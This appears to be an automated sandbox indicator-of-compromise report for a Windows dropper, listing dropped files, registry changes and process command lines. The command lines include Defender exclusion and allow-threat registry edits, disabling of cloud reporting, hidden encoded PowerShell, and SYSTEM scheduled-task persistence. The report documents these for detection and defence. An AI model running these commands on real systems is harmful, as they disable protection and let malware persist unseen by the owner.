IOC Report
file.exe

loading gif

Files

File Path
Type
Category
Malicious
file.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\7zSFD85.tmp\Install.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\System32\GroupPolicy\gpt.ini
ASCII text
dropped
malicious
C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\GPooAyT.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\avEZCOa.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\7zSFD85.tmp\__data__\config.txt
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdb0qitz.bkl.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oso25ttd.2p4.psm1
very short file (no magic)
dropped
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Windows\System32\GroupPolicy\Machine\Registry.pol
RAGE Package Format (RPF),
dropped
C:\Windows\Tasks\bGZpGlqvDNKjraWjlZ.job
data
dropped
C:\Windows\Temp\__PSScriptPolicyTest_4m4fvhis.grl.ps1
very short file (no magic)
dropped
C:\Windows\Temp\__PSScriptPolicyTest_xfb5zmft.y1e.psm1
very short file (no magic)
dropped
\Device\ConDrv
ASCII text, with CRLF, CR line terminators
dropped
C:\Users\user\AppData\Local\Temp\7zS3361.tmp\__data__\config.txt
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngtmqmma.n4d.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oq22ozvi.ndj.psm1
very short file (no magic)
dropped
C:\Windows\Temp\__PSScriptPolicyTest_aedgb5uc.4sx.psm1
very short file (no magic)
dropped
C:\Windows\Temp\__PSScriptPolicyTest_k13f2ewv.k03.ps1
very short file (no magic)
dropped
There are 15 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\file.exe
C:\Users\user\Desktop\file.exe
malicious
C:\Users\user\AppData\Local\Temp\7zSFD85.tmp\Install.exe
.\Install.exe
malicious
C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe
.\Install.exe /S /site_id "525403"
malicious
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
malicious
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
malicious
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gqlLYiBSq" /SC once /ST 05:56:18 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gqlLYiBSq"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gqlLYiBSq"
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 17:28:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe\" d8 /site_id 525403 /S" /V1 /F
malicious
C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe
C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe d8 /site_id 525403 /S
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
malicious
C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exe
.\Install.exe
malicious
C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exe
.\Install.exe /S /site_id "525403"
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gUpzuvmWb" /SC once /ST 15:28:53 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gUpzuvmWb"
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gUpzuvmWb"
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 17:15:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe\" d8 /site_id 525403 /S" /V1 /F
malicious
C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe
C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe d8 /site_id 525403 /S
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\forfiles.exe
C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\forfiles.exe
C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 47 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://oneget.orgX
unknown
https://oneget.orgformat.ps1xmlagement.dll2040.missionsand
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
https://oneget.org
unknown
http://crl.m
unknown
There are 4 hidden URLs, click here to show them.

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
PendingFileRenameOperations
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions
exe
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet
SpyNetReporting
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
PendingFileRenameOperations
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
225451
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
256596
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
242872
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147749373
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147807942
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147735735
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147737010
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147737007
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147737503
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147735503
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1FA58DB4000
heap
page read and write
6A60000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
B5C8000
heap
page read and write
1FA58D7D000
heap
page read and write
2E6D000
stack
page read and write
1B116CA0000
heap
page read and write
7C00000
trusted library allocation
page read and write
B340000
heap
page read and write
6A60000
trusted library allocation
page read and write
1FA58CBA000
heap
page read and write
418B000
trusted library allocation
page read and write
1FA59733000
heap
page read and write
63A9000
trusted library allocation
page read and write
2C40000
unkown
page read and write
1FA58CA0000
heap
page read and write
7FFC9DD10000
trusted library allocation
page read and write
1B116D03000
heap
page read and write
3510000
heap
page read and write
B520000
heap
page read and write
6870000
trusted library allocation
page read and write
1FA58DCB000
heap
page read and write
7FFC9DCD0000
trusted library allocation
page read and write
1F81000
trusted library allocation
page read and write
6A00000
trusted library allocation
page read and write
B5DF000
heap
page read and write
1B11A0B0000
trusted library allocation
page read and write
349E000
stack
page read and write
7670000
trusted library allocation
page read and write
1FA58DEF000
heap
page read and write
35B2000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
185E825D000
heap
page read and write
6750000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
185E826B000
heap
page read and write
6AB0000
unkown
page read and write
63E5000
trusted library allocation
page read and write
6760000
trusted library allocation
page read and write
ACFA47E000
stack
page read and write
6A60000
unkown
page read and write
82F2A7D000
stack
page read and write
3280000
trusted library allocation
page read and write
6A68000
trusted library allocation
page read and write
4C3000
stack
page read and write
22F0000
unkown
page readonly
6A50000
unkown
page read and write
6A68000
trusted library allocation
page read and write
22EC043C000
heap
page read and write
1B686C3D000
heap
page read and write
34F7000
heap
page read and write
25BF000
stack
page read and write
1E99CC00000
heap
page read and write
2A90000
heap
page read and write
7960000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
6A7000
heap
page read and write
79A0000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
2D55000
heap
page read and write
6929000
trusted library allocation
page read and write
6750000
trusted library allocation
page read and write
7FFC9DCA0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
6A55000
trusted library allocation
page read and write
294F000
stack
page read and write
63C0000
trusted library allocation
page read and write
7B00000
unkown
page read and write
68B0000
trusted library allocation
page read and write
422000
unkown
page write copy
7B9E000
stack
page read and write
6AA0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
77D0000
trusted library allocation
page read and write
69C9000
trusted library allocation
page read and write
1B130DC7000
heap
page read and write
294D000
stack
page read and write
43F9000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
29A0000
heap
page read and write
41286FC000
stack
page read and write
4232000
trusted library allocation
page read and write
6A60000
unkown
page read and write
82F2B7F000
stack
page read and write
691A000
trusted library allocation
page read and write
7742000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
287C000
stack
page read and write
7BC0000
trusted library allocation
page read and write
7940000
trusted library allocation
page read and write
1D4FEE75000
heap
page read and write
1FA58D72000
heap
page read and write
6AA0000
trusted library allocation
page read and write
67F0000
trusted library allocation
page read and write
7525000
trusted library allocation
page read and write
6AB0000
trusted library allocation
page read and write
4418000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
69BF000
trusted library allocation
page read and write
63D0000
unkown
page read and write
300F000
stack
page read and write
6AA0000
trusted library allocation
page read and write
1FA58CB5000
heap
page read and write
1B11A206000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6A10000
trusted library allocation
page read and write
7C30000
trusted library allocation
page read and write
69E9000
trusted library allocation
page read and write
185E8C02000
trusted library allocation
page read and write
29F0000
trusted library allocation
page read and write
185E825F000
heap
page read and write
63E0000
trusted library allocation
page read and write
69B0000
trusted library allocation
page read and write
2FAF000
stack
page read and write
1FA58D54000
heap
page read and write
77B0000
trusted library allocation
page read and write
1FA5980F000
heap
page read and write
6AA0000
unkown
page read and write
1FA58DBE000
heap
page read and write
2DEE000
stack
page read and write
7530000
trusted library allocation
page read and write
1FA58C85000
heap
page read and write
1FA58DC3000
heap
page read and write
1FA58C5E000
heap
page read and write
6A60000
trusted library allocation
page read and write
D11000
unkown
page execute read
6A55000
trusted library allocation
page read and write
1FA5980A000
heap
page read and write
7660000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
699E000
trusted library allocation
page read and write
1B11B4C4000
trusted library allocation
page read and write
1B118C90000
trusted library allocation
page read and write
63E7000
trusted library allocation
page read and write
43D0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
2FEE000
stack
page read and write
7667000
trusted library allocation
page read and write
1B686B91000
heap
page read and write
3670000
heap
page read and write
784A000
trusted library allocation
page read and write
EF5E47B000
stack
page read and write
6900000
trusted library allocation
page read and write
1FA58CBA000
heap
page read and write
1B686089000
heap
page read and write
6A60000
trusted library allocation
page read and write
7665000
trusted library allocation
page read and write
2541AE40000
heap
page read and write
6AA0000
trusted library allocation
page read and write
7FFC9DC90000
trusted library allocation
page read and write
63D0000
trusted library allocation
page read and write
2541ADA0000
heap
page read and write
6A60000
trusted library allocation
page read and write
7FFC9DC60000
trusted library allocation
page read and write
DD33000
trusted library allocation
page read and write
22EC043E000
heap
page read and write
6A60000
trusted library allocation
page read and write
78F8000
trusted library allocation
page read and write
33A8000
heap
page read and write
41FE000
trusted library allocation
page read and write
6A65000
trusted library allocation
page read and write
257E000
stack
page read and write
927758C000
stack
page read and write
7B80000
trusted library allocation
page read and write
3521000
heap
page read and write
424D000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
7810000
trusted library allocation
page read and write
1FA58D51000
heap
page read and write
1FA58C6B000
heap
page read and write
1FA58CB7000
heap
page read and write
1B686C02000
heap
page read and write
13C9000
unkown
page read and write
6AA0000
trusted library allocation
page read and write
7800000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
6952000
trusted library allocation
page read and write
ACF9A7B000
stack
page read and write
7A50000
trusted library allocation
page read and write
7FFC9DBF0000
trusted library allocation
page read and write
414C000
trusted library allocation
page read and write
35D0000
trusted library allocation
page read and write
22EA000
stack
page read and write
B250000
heap
page read and write
2F30000
trusted library allocation
page read and write
41281FF000
stack
page read and write
349F000
stack
page read and write
6A40000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
6AB0000
trusted library allocation
page read and write
691E000
trusted library allocation
page read and write
2AD0000
unkown
page readonly
79B0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
6400000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
2D30000
heap
page read and write
304E000
stack
page read and write
400000
unkown
page readonly
290F000
stack
page read and write
1FA58C98000
heap
page read and write
6760000
trusted library allocation
page read and write
7710000
trusted library allocation
page read and write
6AA0000
unkown
page read and write
6AA6000
trusted library allocation
page read and write
1D4FEE69000
heap
page read and write
1B1187C0000
heap
page read and write
41B000
unkown
page readonly
15DFD5F0000
remote allocation
page read and write
784F000
trusted library allocation
page read and write
2C4E3FF000
stack
page read and write
1FA58DD7000
heap
page read and write
2C4E37D000
stack
page read and write
63D0000
trusted library allocation
page read and write
287E000
stack
page read and write
2F40000
remote allocation
page read and write
B55C000
heap
page read and write
7660000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6A00000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
2C20000
heap
page read and write
6F3000
heap
page read and write
7C60000
trusted library allocation
page read and write
1B130EA0000
heap
page read and write
1FA58DB0000
heap
page read and write
7670000
trusted library allocation
page read and write
7520000
trusted library allocation
page read and write
5CC06FF000
stack
page read and write
6AA0000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
7830000
trusted library allocation
page execute and read and write
7530000
trusted library allocation
page read and write
1FA58D74000
heap
page read and write
63C0000
trusted library allocation
page read and write
1380000
unkown
page readonly
7990000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7A90000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
619C87B000
stack
page read and write
6A50000
trusted library allocation
page read and write
68A000
heap
page read and write
